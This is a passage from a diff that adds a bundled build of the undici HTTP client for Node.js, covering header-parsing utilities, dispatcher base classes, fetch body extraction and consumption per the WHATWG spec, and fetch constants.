+// > Currently, the only server names supported are DNS hostnames +function getServerName (host) { + if (!host) { + return null + } + + assert.strictEqual(typeof host, 'string') + + const servername = getHostname(host) + if (net.isIP(servername)) { + return '' + } + + return servername +} + +function deepClone (obj) { + return JSON.parse(JSON.stringify(obj)) +} + +function isAsyncIterable (obj) { + return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') +} + +function isIterable (obj) { + return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) +} + +function bodyLength (body) { + if (body == null) { + return 0 + } else if (isStream(body)) { + const state = body._readableState + return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) + ? state.length + : null + } else if (isBlobLike(body)) { + return body.size != null ? body.size : null + } else if (isBuffer(body)) { + return body.byteLength + } + + return null +} + +function isDestroyed (stream) { + return !stream || !!(stream.destroyed || stream[kDestroyed]) +} + +function isReadableAborted (stream) { + const state = stream && stream._readableState + return isDestroyed(stream) && state && !state.endEmitted +} + +function destroy (stream, err) { + if (stream == null || !isStream(stream) || isDestroyed(stream)) { + return + } + + if (typeof stream.destroy === 'function') { + if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { + // See: https://github.com/nodejs/node/pull/38505/files + stream.socket = null + } + + stream.destroy(err) + } else if (err) { + process.nextTick((stream, err) => { + stream.emit('error', err) + }, stream, err) + } + + if (stream.destroyed !== true) { + stream[kDestroyed] = true + } +} + +const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ +function parseKeepAliveTimeout (val) { + const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) + return m ? parseInt(m[1], 10) * 1000 : null +} + +function parseHeaders (headers, obj = {}) { + // For H2 support + if (!Array.isArray(headers)) return headers + + for (let i = 0; i < headers.length; i += 2) { + const key = headers[i].toString().toLowerCase() + let val = obj[key] + + if (!val) { + if (Array.isArray(headers[i + 1])) { + obj[key] = headers[i + 1].map(x => x.toString('utf8')) + } else { + obj[key] = headers[i + 1].toString('utf8') + } + } else { + if (!Array.isArray(val)) { + val = [val] + obj[key] = val + } + val.push(headers[i + 1].toString('utf8')) + } + } + + // See https://github.com/nodejs/node/pull/46528 + if ('content-length' in obj && 'content-disposition' in obj) { + obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') + } + + return obj +} + +function parseRawHeaders (headers) { + const ret = [] + let hasContentLength = false + let contentDispositionIdx = -1 + + for (let n = 0; n < headers.length; n += 2) { + const key = headers[n + 0].toString() + const val = headers[n + 1].toString('utf8') + + if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { + ret.push(key, val) + hasContentLength = true + } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { + contentDispositionIdx = ret.push(key, val) - 1 + } else { + ret.push(key, val) + } + } + + // See https://github.com/nodejs/node/pull/46528 + if (hasContentLength && contentDispositionIdx !== -1) { + ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') + } + + return ret +} + +function isBuffer (buffer) { + // See, https://github.com/mcollina/undici/pull/319 + return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) +} + +function validateHandler (handler, method, upgrade) { + if (!handler || typeof handler !== 'object') { + throw new InvalidArgumentError('handler must be an object') + } + + if (typeof handler.onConnect !== 'function') { + throw new InvalidArgumentError('invalid onConnect method') + } + + if (typeof handler.onError !== 'function') { + throw new InvalidArgumentError('invalid onError method') + } + + if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { + throw new InvalidArgumentError('invalid onBodySent method') + } + + if (upgrade || method === 'CONNECT') { + if (typeof handler.onUpgrade !== 'function') { + throw new InvalidArgumentError('invalid onUpgrade method') + } + } else { + if (typeof handler.onHeaders !== 'function') { + throw new InvalidArgumentError('invalid onHeaders method') + } + + if (typeof handler.onData !== 'function') { + throw new InvalidArgumentError('invalid onData method') + } + + if (typeof handler.onComplete !== 'function') { + throw new InvalidArgumentError('invalid onComplete method') + } + } +} + +// A body is disturbed if it has been read from and it cannot +// be re-used without losing state or data. +function isDisturbed (body) { + return !!(body && ( + stream.isDisturbed + ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? + : body[kBodyUsed] || + body.readableDidRead || + (body._readableState && body._readableState.dataEmitted) || + isReadableAborted(body) + )) +} + +function isErrored (body) { + return !!(body && ( + stream.isErrored + ? stream.isErrored(body) + : /state: 'errored'/.test(nodeUtil.inspect(body) + ))) +} + +function isReadable (body) { + return !!(body && ( + stream.isReadable + ? stream.isReadable(body) + : /state: 'readable'/.test(nodeUtil.inspect(body) + ))) +} + +function getSocketInfo (socket) { + return { + localAddress: socket.localAddress, + localPort: socket.localPort, + remoteAddress: socket.remoteAddress, + remotePort: socket.remotePort, + remoteFamily: socket.remoteFamily, + timeout: socket.timeout, + bytesWritten: socket.bytesWritten, + bytesRead: socket.bytesRead + } +} + +async function * convertIterableToBuffer (iterable) { + for await (const chunk of iterable) { + yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) + } +} + +let ReadableStream +function ReadableStreamFrom (iterable) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + if (ReadableStream.from) { + return ReadableStream.from(convertIterableToBuffer(iterable)) + } + + let iterator + return new ReadableStream( + { + async start () { + iterator = iterable[Symbol.asyncIterator]() + }, + async pull (controller) { + const { done, value } = await iterator.next() + if (done) { + queueMicrotask(() => { + controller.close() + }) + } else { + const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) + controller.enqueue(new Uint8Array(buf)) + } + return controller.desiredSize > 0 + }, + async cancel (reason) { + await iterator.return() + } + }, + 0 + ) +} + +// The chunk should be a FormData instance and contains +// all the required methods. +function isFormDataLike (object) { + return ( + object && + typeof object === 'object' && + typeof object.append === 'function' && + typeof object.delete === 'function' && + typeof object.get === 'function' && + typeof object.getAll === 'function' && + typeof object.has === 'function' && + typeof object.set === 'function' && + object[Symbol.toStringTag] === 'FormData' + ) +} + +function throwIfAborted (signal) { + if (!signal) { return } + if (typeof signal.throwIfAborted === 'function') { + signal.throwIfAborted() + } else { + if (signal.aborted) { + // DOMException not available < v17.0.0 + const err = new Error('The operation was aborted') + err.name = 'AbortError' + throw err + } + } +} + +function addAbortListener (signal, listener) { + if ('addEventListener' in signal) { + signal.addEventListener('abort', listener, { once: true }) + return () => signal.removeEventListener('abort', listener) + } + signal.addListener('abort', listener) + return () => signal.removeListener('abort', listener) +} + +const hasToWellFormed = !!String.prototype.toWellFormed + +/** + * @param {string} val + */ +function toUSVString (val) { + if (hasToWellFormed) { + return `${val}`.toWellFormed() + } else if (nodeUtil.toUSVString) { + return nodeUtil.toUSVString(val) + } + + return `${val}` +} + +// Parsed accordingly to RFC 9110 +// https://www.rfc-editor.org/rfc/rfc9110#field.content-range +function parseRangeHeader (range) { + if (range == null || range === '') return { start: 0, end: null, size: null } + + const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null + return m + ? { + start: parseInt(m[1]), + end: m[2] ? parseInt(m[2]) : null, + size: m[3] ? parseInt(m[3]) : null + } + : null +} + +const kEnumerableProperty = Object.create(null) +kEnumerableProperty.enumerable = true + +module.exports = { + kEnumerableProperty, + nop, + isDisturbed, + isErrored, + isReadable, + toUSVString, + isReadableAborted, + isBlobLike, + parseOrigin, + parseURL, + getServerName, + isStream, + isIterable, + isAsyncIterable, + isDestroyed, + parseRawHeaders, + parseHeaders, + parseKeepAliveTimeout, + destroy, + bodyLength, + deepClone, + ReadableStreamFrom, + isBuffer, + validateHandler, + getSocketInfo, + isFormDataLike, + buildURL, + throwIfAborted, + addAbortListener, + parseRangeHeader, + nodeMajor, + nodeMinor, + nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), + safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] +} + + +/***/ }), + +/***/ 4839: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Dispatcher = __nccwpck_require__(412) +const { + ClientDestroyedError, + ClientClosedError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) + +const kDestroyed = Symbol('destroyed') +const kClosed = Symbol('closed') +const kOnDestroyed = Symbol('onDestroyed') +const kOnClosed = Symbol('onClosed') +const kInterceptedDispatch = Symbol('Intercepted Dispatch') + +class DispatcherBase extends Dispatcher { + constructor () { + super() + + this[kDestroyed] = false + this[kOnDestroyed] = null + this[kClosed] = false + this[kOnClosed] = [] + } + + get destroyed () { + return this[kDestroyed] + } + + get closed () { + return this[kClosed] + } + + get interceptors () { + return this[kInterceptors] + } + + set interceptors (newInterceptors) { + if (newInterceptors) { + for (let i = newInterceptors.length - 1; i >= 0; i--) { + const interceptor = this[kInterceptors][i] + if (typeof interceptor !== 'function') { + throw new InvalidArgumentError('interceptor must be an function') + } + } + } + + this[kInterceptors] = newInterceptors + } + + close (callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + this.close((err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (this[kDestroyed]) { + queueMicrotask(() => callback(new ClientDestroyedError(), null)) + return + } + + if (this[kClosed]) { + if (this[kOnClosed]) { + this[kOnClosed].push(callback) + } else { + queueMicrotask(() => callback(null, null)) + } + return + } + + this[kClosed] = true + this[kOnClosed].push(callback) + + const onClosed = () => { + const callbacks = this[kOnClosed] + this[kOnClosed] = null + for (let i = 0; i < callbacks.length; i++) { + callbacks[i](null, null) + } + } + + // Should not error. + this[kClose]() + .then(() => this.destroy()) + .then(() => { + queueMicrotask(onClosed) + }) + } + + destroy (err, callback) { + if (typeof err === 'function') { + callback = err + err = null + } + + if (callback === undefined) { + return new Promise((resolve, reject) => { + this.destroy(err, (err, data) => { + return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) + }) + }) + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (this[kDestroyed]) { + if (this[kOnDestroyed]) { + this[kOnDestroyed].push(callback) + } else { + queueMicrotask(() => callback(null, null)) + } + return + } + + if (!err) { + err = new ClientDestroyedError() + } + + this[kDestroyed] = true + this[kOnDestroyed] = this[kOnDestroyed] || [] + this[kOnDestroyed].push(callback) + + const onDestroyed = () => { + const callbacks = this[kOnDestroyed] + this[kOnDestroyed] = null + for (let i = 0; i < callbacks.length; i++) { + callbacks[i](null, null) + } + } + + // Should not error. + this[kDestroy](err).then(() => { + queueMicrotask(onDestroyed) + }) + } + + [kInterceptedDispatch] (opts, handler) { + if (!this[kInterceptors] || this[kInterceptors].length === 0) { + this[kInterceptedDispatch] = this[kDispatch] + return this[kDispatch](opts, handler) + } + + let dispatch = this[kDispatch].bind(this) + for (let i = this[kInterceptors].length - 1; i >= 0; i--) { + dispatch = this[kInterceptors][i](dispatch) + } + this[kInterceptedDispatch] = dispatch + return dispatch(opts, handler) + } + + dispatch (opts, handler) { + if (!handler || typeof handler !== 'object') { + throw new InvalidArgumentError('handler must be an object') + } + + try { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object.') + } + + if (this[kDestroyed] || this[kOnDestroyed]) { + throw new ClientDestroyedError() + } + + if (this[kClosed]) { + throw new ClientClosedError() + } + + return this[kInterceptedDispatch](opts, handler) + } catch (err) { + if (typeof handler.onError !== 'function') { + throw new InvalidArgumentError('invalid onError method') + } + + handler.onError(err) + + return false + } + } +} + +module.exports = DispatcherBase + + +/***/ }), + +/***/ 412: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const EventEmitter = __nccwpck_require__(2361) + +class Dispatcher extends EventEmitter { + dispatch () { + throw new Error('not implemented') + } + + close () { + throw new Error('not implemented') + } + + destroy () { + throw new Error('not implemented') + } +} + +module.exports = Dispatcher + + +/***/ }), + +/***/ 1472: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Busboy = __nccwpck_require__(727) +const util = __nccwpck_require__(3983) +const { + ReadableStreamFrom, + isBlobLike, + isReadableStreamLike, + readableStreamClose, + createDeferredPromise, + fullyReadBody +} = __nccwpck_require__(2538) +const { FormData } = __nccwpck_require__(2015) +const { kState } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { DOMException, structuredClone } = __nccwpck_require__(1037) +const { Blob, File: NativeFile } = __nccwpck_require__(4300) +const { kBodyUsed } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { isErrored } = __nccwpck_require__(3983) +const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) +const { File: UndiciFile } = __nccwpck_require__(8511) +const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + +let ReadableStream = globalThis.ReadableStream + +/** @type {globalThis['File']} */ +const File = NativeFile ?? UndiciFile +const textEncoder = new TextEncoder() +const textDecoder = new TextDecoder() + +// https://fetch.spec.whatwg.org/#concept-bodyinit-extract +function extractBody (object, keepalive = false) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + // 1. Let stream be null. + let stream = null + + // 2. If object is a ReadableStream object, then set stream to object. + if (object instanceof ReadableStream) { + stream = object + } else if (isBlobLike(object)) { + // 3. Otherwise, if object is a Blob object, set stream to the + // result of running object’s get stream. + stream = object.stream() + } else { + // 4. Otherwise, set stream to a new ReadableStream object, and set + // up stream. + stream = new ReadableStream({ + async pull (controller) { + controller.enqueue( + typeof source === 'string' ? textEncoder.encode(source) : source + ) + queueMicrotask(() => readableStreamClose(controller)) + }, + start () {}, + type: undefined + }) + } + + // 5. Assert: stream is a ReadableStream object. + assert(isReadableStreamLike(stream)) + + // 6. Let action be null. + let action = null + + // 7. Let source be null. + let source = null + + // 8. Let length be null. + let length = null + + // 9. Let type be null. + let type = null + + // 10. Switch on object: + if (typeof object === 'string') { + // Set source to the UTF-8 encoding of object. + // Note: setting source to a Uint8Array here breaks some mocking assumptions. + source = object + + // Set type to `text/plain;charset=UTF-8`. + type = 'text/plain;charset=UTF-8' + } else if (object instanceof URLSearchParams) { + // URLSearchParams + + // spec says to run application/x-www-form-urlencoded on body.list + // this is implemented in Node.js as apart of an URLSearchParams instance toString method + // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 + // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 + + // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. + source = object.toString() + + // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. + type = 'application/x-www-form-urlencoded;charset=UTF-8' + } else if (isArrayBuffer(object)) { + // BufferSource/ArrayBuffer + + // Set source to a copy of the bytes held by object. + source = new Uint8Array(object.slice()) + } else if (ArrayBuffer.isView(object)) { + // BufferSource/ArrayBufferView + + // Set source to a copy of the bytes held by object. + source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) + } else if (util.isFormDataLike(object)) { + const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` + const prefix = `--${boundary}\r\nContent-Disposition: form-data` + + /*! formdata-polyfill. MIT License. Jimmy Wärting */ + const escape = (str) => + str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') + const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') + + // Set action to this step: run the multipart/form-data + // encoding algorithm, with object’s entry list and UTF-8. + // - This ensures that the body is immutable and can't be changed afterwords + // - That the content-length is calculated in advance. + // - And that all parts are pre-encoded and ready to be sent. + + const blobParts = [] + const rn = new Uint8Array([13, 10]) // '\r\n' + length = 0 + let hasUnknownSizeValue = false + + for (const [name, value] of object) { + if (typeof value === 'string') { + const chunk = textEncoder.encode(prefix + + `; name="${escape(normalizeLinefeeds(name))}"` + + `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) + blobParts.push(chunk) + length += chunk.byteLength + } else { + const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + + (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + + `Content-Type: ${ + value.type || 'application/octet-stream' + }\r\n\r\n`) + blobParts.push(chunk, value, rn) + if (typeof value.size === 'number') { + length += chunk.byteLength + value.size + rn.byteLength + } else { + hasUnknownSizeValue = true + } + } + } + + const chunk = textEncoder.encode(`--${boundary}--`) + blobParts.push(chunk) + length += chunk.byteLength + if (hasUnknownSizeValue) { + length = null + } + + // Set source to object. + source = object + + action = async function * () { + for (const part of blobParts) { + if (part.stream) { + yield * part.stream() + } else { + yield part + } + } + } + + // Set type to `multipart/form-data; boundary=`, + // followed by the multipart/form-data boundary string generated + // by the multipart/form-data encoding algorithm. + type = 'multipart/form-data; boundary=' + boundary + } else if (isBlobLike(object)) { + // Blob + + // Set source to object. + source = object + + // Set length to object’s size. + length = object.size + + // If object’s type attribute is not the empty byte sequence, set + // type to its value. + if (object.type) { + type = object.type + } + } else if (typeof object[Symbol.asyncIterator] === 'function') { + // If keepalive is true, then throw a TypeError. + if (keepalive) { + throw new TypeError('keepalive') + } + + // If object is disturbed or locked, then throw a TypeError. + if (util.isDisturbed(object) || object.locked) { + throw new TypeError( + 'Response body object should not be disturbed or locked' + ) + } + + stream = + object instanceof ReadableStream ? object : ReadableStreamFrom(object) + } + + // 11. If source is a byte sequence, then set action to a + // step that returns source and length to source’s length. + if (typeof source === 'string' || util.isBuffer(source)) { + length = Buffer.byteLength(source) + } + + // 12. If action is non-null, then run these steps in in parallel: + if (action != null) { + // Run action. + let iterator + stream = new ReadableStream({ + async start () { + iterator = action(object)[Symbol.asyncIterator]() + }, + async pull (controller) { + const { value, done } = await iterator.next() + if (done) { + // When running action is done, close stream. + queueMicrotask(() => { + controller.close() + }) + } else { + // Whenever one or more bytes are available and stream is not errored, + // enqueue a Uint8Array wrapping an ArrayBuffer containing the available + // bytes into stream. + if (!isErrored(stream)) { + controller.enqueue(new Uint8Array(value)) + } + } + return controller.desiredSize > 0 + }, + async cancel (reason) { + await iterator.return() + }, + type: undefined + }) + } + + // 13. Let body be a body whose stream is stream, source is source, + // and length is length. + const body = { stream, source, length } + + // 14. Return (body, type). + return [body, type] +} + +// https://fetch.spec.whatwg.org/#bodyinit-safely-extract +function safelyExtractBody (object, keepalive = false) { + if (!ReadableStream) { + // istanbul ignore next + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + // To safely extract a body and a `Content-Type` value from + // a byte sequence or BodyInit object object, run these steps: + + // 1. If object is a ReadableStream object, then: + if (object instanceof ReadableStream) { + // Assert: object is neither disturbed nor locked. + // istanbul ignore next + assert(!util.isDisturbed(object), 'The body has already been consumed.') + // istanbul ignore next + assert(!object.locked, 'The stream is locked.') + } + + // 2. Return the results of extracting object. + return extractBody(object, keepalive) +} + +function cloneBody (body) { + // To clone a body body, run these steps: + + // https://fetch.spec.whatwg.org/#concept-body-clone + + // 1. Let « out1, out2 » be the result of teeing body’s stream. + const [out1, out2] = body.stream.tee() + const out2Clone = structuredClone(out2, { transfer: [out2] }) + // This, for whatever reasons, unrefs out2Clone which allows + // the process to exit by itself. + const [, finalClone] = out2Clone.tee() + + // 2. Set body’s stream to out1. + body.stream = out1 + + // 3. Return a body whose stream is out2 and other members are copied from body. + return { + stream: finalClone, + length: body.length, + source: body.source + } +} + +async function * consumeBody (body) { + if (body) { + if (isUint8Array(body)) { + yield body + } else { + const stream = body.stream + + if (util.isDisturbed(stream)) { + throw new TypeError('The body has already been consumed.') + } + + if (stream.locked) { + throw new TypeError('The stream is locked.') + } + + // Compat. + stream[kBodyUsed] = true + + yield * stream + } + } +} + +function throwIfAborted (state) { + if (state.aborted) { + throw new DOMException('The operation was aborted.', 'AbortError') + } +} + +function bodyMixinMethods (instance) { + const methods = { + blob () { + // The blob() method steps are to return the result of + // running consume body with this and the following step + // given a byte sequence bytes: return a Blob whose + // contents are bytes and whose type attribute is this’s + // MIME type. + return specConsumeBody(this, (bytes) => { + let mimeType = bodyMimeType(this) + + if (mimeType === 'failure') { + mimeType = '' + } else if (mimeType) { + mimeType = serializeAMimeType(mimeType) + } + + // Return a Blob whose contents are bytes and type attribute + // is mimeType. + return new Blob([bytes], { type: mimeType }) + }, instance) + }, + + arrayBuffer () { + // The arrayBuffer() method steps are to return the result + // of running consume body with this and the following step + // given a byte sequence bytes: return a new ArrayBuffer + // whose contents are bytes. + return specConsumeBody(this, (bytes) => { + return new Uint8Array(bytes).buffer + }, instance) + }, + + text () { + // The text() method steps are to return the result of running + // consume body with this and UTF-8 decode. + return specConsumeBody(this, utf8DecodeBytes, instance) + }, + + json () { + // The json() method steps are to return the result of running + // consume body with this and parse JSON from bytes. + return specConsumeBody(this, parseJSONFromBytes, instance) + }, + + async formData () { + webidl.brandCheck(this, instance) + + throwIfAborted(this[kState]) + + const contentType = this.headers.get('Content-Type') + + // If mimeType’s essence is "multipart/form-data", then: + if (/multipart\/form-data/.test(contentType)) { + const headers = {} + for (const [key, value] of this.headers) headers[key.toLowerCase()] = value + + const responseFormData = new FormData() + + let busboy + + try { + busboy = new Busboy({ + headers, + preservePath: true + }) + } catch (err) { + throw new DOMException(`${err}`, 'AbortError') + } + + busboy.on('field', (name, value) => { + responseFormData.append(name, value) + }) + busboy.on('file', (name, value, filename, encoding, mimeType) => { + const chunks = [] + + if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { + let base64chunk = '' + + value.on('data', (chunk) => { + base64chunk += chunk.toString().replace(/[\r\n]/gm, '') + + const end = base64chunk.length - base64chunk.length % 4 + chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) + + base64chunk = base64chunk.slice(end) + }) + value.on('end', () => { + chunks.push(Buffer.from(base64chunk, 'base64')) + responseFormData.append(name, new File(chunks, filename, { type: mimeType })) + }) + } else { + value.on('data', (chunk) => { + chunks.push(chunk) + }) + value.on('end', () => { + responseFormData.append(name, new File(chunks, filename, { type: mimeType })) + }) + } + }) + + const busboyResolve = new Promise((resolve, reject) => { + busboy.on('finish', resolve) + busboy.on('error', (err) => reject(new TypeError(err))) + }) + + if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) + busboy.end() + await busboyResolve + + return responseFormData + } else if (/application\/x-www-form-urlencoded/.test(contentType)) { + // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: + + // 1. Let entries be the result of parsing bytes. + let entries + try { + let text = '' + // application/x-www-form-urlencoded parser will keep the BOM. + // https://url.spec.whatwg.org/#concept-urlencoded-parser + // Note that streaming decoder is stateful and cannot be reused + const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) + + for await (const chunk of consumeBody(this[kState].body)) { + if (!isUint8Array(chunk)) { + throw new TypeError('Expected Uint8Array chunk') + } + text += streamingDecoder.decode(chunk, { stream: true }) + } + text += streamingDecoder.decode() + entries = new URLSearchParams(text) + } catch (err) { + // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. + // 2. If entries is failure, then throw a TypeError. + throw Object.assign(new TypeError(), { cause: err }) + } + + // 3. Return a new FormData object whose entries are entries. + const formData = new FormData() + for (const [name, value] of entries) { + formData.append(name, value) + } + return formData + } else { + // Wait a tick before checking if the request has been aborted. + // Otherwise, a TypeError can be thrown when an AbortError should. + await Promise.resolve() + + throwIfAborted(this[kState]) + + // Otherwise, throw a TypeError. + throw webidl.errors.exception({ + header: `${instance.name}.formData`, + message: 'Could not parse content as FormData.' + }) + } + } + } + + return methods +} + +function mixinBody (prototype) { + Object.assign(prototype.prototype, bodyMixinMethods(prototype)) +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-body-consume-body + * @param {Response|Request} object + * @param {(value: unknown) => unknown} convertBytesToJSValue + * @param {Response|Request} instance + */ +async function specConsumeBody (object, convertBytesToJSValue, instance) { + webidl.brandCheck(object, instance) + + throwIfAborted(object[kState]) + + // 1. If object is unusable, then return a promise rejected + // with a TypeError. + if (bodyUnusable(object[kState].body)) { + throw new TypeError('Body is unusable') + } + + // 2. Let promise be a new promise. + const promise = createDeferredPromise() + + // 3. Let errorSteps given error be to reject promise with error. + const errorSteps = (error) => promise.reject(error) + + // 4. Let successSteps given a byte sequence data be to resolve + // promise with the result of running convertBytesToJSValue + // with data. If that threw an exception, then run errorSteps + // with that exception. + const successSteps = (data) => { + try { + promise.resolve(convertBytesToJSValue(data)) + } catch (e) { + errorSteps(e) + } + } + + // 5. If object’s body is null, then run successSteps with an + // empty byte sequence. + if (object[kState].body == null) { + successSteps(new Uint8Array()) + return promise.promise + } + + // 6. Otherwise, fully read object’s body given successSteps, + // errorSteps, and object’s relevant global object. + await fullyReadBody(object[kState].body, successSteps, errorSteps) + + // 7. Return promise. + return promise.promise +} + +// https://fetch.spec.whatwg.org/#body-unusable +function bodyUnusable (body) { + // An object including the Body interface mixin is + // said to be unusable if its body is non-null and + // its body’s stream is disturbed or locked. + return body != null && (body.stream.locked || util.isDisturbed(body.stream)) +} + +/** + * @see https://encoding.spec.whatwg.org/#utf-8-decode + * @param {Buffer} buffer + */ +function utf8DecodeBytes (buffer) { + if (buffer.length === 0) { + return '' + } + + // 1. Let buffer be the result of peeking three bytes from + // ioQueue, converted to a byte sequence. + + // 2. If buffer is 0xEF 0xBB 0xBF, then read three + // bytes from ioQueue. (Do nothing with those bytes.) + if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { + buffer = buffer.subarray(3) + } + + // 3. Process a queue with an instance of UTF-8’s + // decoder, ioQueue, output, and "replacement". + const output = textDecoder.decode(buffer) + + // 4. Return output. + return output +} + +/** + * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value + * @param {Uint8Array} bytes + */ +function parseJSONFromBytes (bytes) { + return JSON.parse(utf8DecodeBytes(bytes)) +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-body-mime-type + * @param {import('./response').Response|import('./request').Request} object + */ +function bodyMimeType (object) { + const { headersList } = object[kState] + const contentType = headersList.get('content-type') + + if (contentType === null) { + return 'failure' + } + + return parseMIMEType(contentType) +} + +module.exports = { + extractBody, + safelyExtractBody, + cloneBody, + mixinBody +} + + +/***/ }), + +/***/ 1037: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) + +const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] +const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) + +const nullBodyStatus = [101, 204, 205, 304] + +const redirectStatus = [301, 302, 303, 307, 308] +const redirectStatusSet = new Set(redirectStatus) + +// https://fetch.spec.whatwg.org/#block-bad-port +const badPorts = [ + '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', + '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', + '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', + '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', + '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', + '10080' +] + +const badPortsSet = new Set(badPorts) + +// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies +const referrerPolicy = [ + '', + 'no-referrer', + 'no-referrer-when-downgrade', + 'same-origin', + 'origin', + 'strict-origin', + 'origin-when-cross-origin', + 'strict-origin-when-cross-origin', + 'unsafe-url' +] +const referrerPolicySet = new Set(referrerPolicy) + +const requestRedirect = ['follow', 'manual', 'error'] + +const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] +const safeMethodsSet = new Set(safeMethods) + +const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] + +const requestCredentials = ['omit', 'same-origin', 'include'] + +const requestCache = [ + 'default', + 'no-store', + 'reload', + 'no-cache', + 'force-cache', + 'only-if-cached' +] + +// https://fetch.spec.whatwg.org/#request-body-header-name +const requestBodyHeader = [ + 'content-encoding', + 'content-language', + 'content-location', + 'content-type', + // See https://github.com/nodejs/undici/issues/2021 + // 'Content-Length' is a forbidden header name, which is typically + // removed in the Headers implementation. However, undici doesn't + // filter out headers, so we add it here. + 'content-length' +] + +// https://fetch.spec.whatwg.org/#enumdef-requestduplex +const requestDuplex = [ + 'half' +] + +// http://fetch.spec.whatwg.org/#forbidden-method +const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] +const forbiddenMethodsSet = new Set(forbiddenMethods) + +const subresource = [ + 'audio', + 'audioworklet', + 'font', + 'image', + 'manifest', + 'paintworklet', + 'script', + 'style', + 'track', + 'video', + 'xslt', + '' +] +const subresourceSet = new Set(subresource) + +/** @type {globalThis['DOMException']} */ +const DOMException = globalThis.DOMException ?? (() => { + // DOMException was only made a global in Node v17.0.0, + // but fetch supports >= v16.8. + try { + atob('~') + } catch (err) { + return Object.getPrototypeOf(err).constructor + } +})() + +let channel + +/** @type {globalThis['structuredClone']} */ +const structuredClone = + globalThis.structuredClone ?? + // https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js + // structuredClone was added in v17.0.0, but fetch supports v16.8 + function structuredClone (value, options = undefined) { + if (arguments.length === 0) { + throw new TypeError('missing argument') + } + + if (!channel) { + channel = new MessageChannel() + } + channel.port1.unref() + channel.port2.unref() + channel.port1.postMessage(value, options?.transfer) + return receiveMessageOnPort(channel.port2).message + } + +module.exports = { + DOMException, + 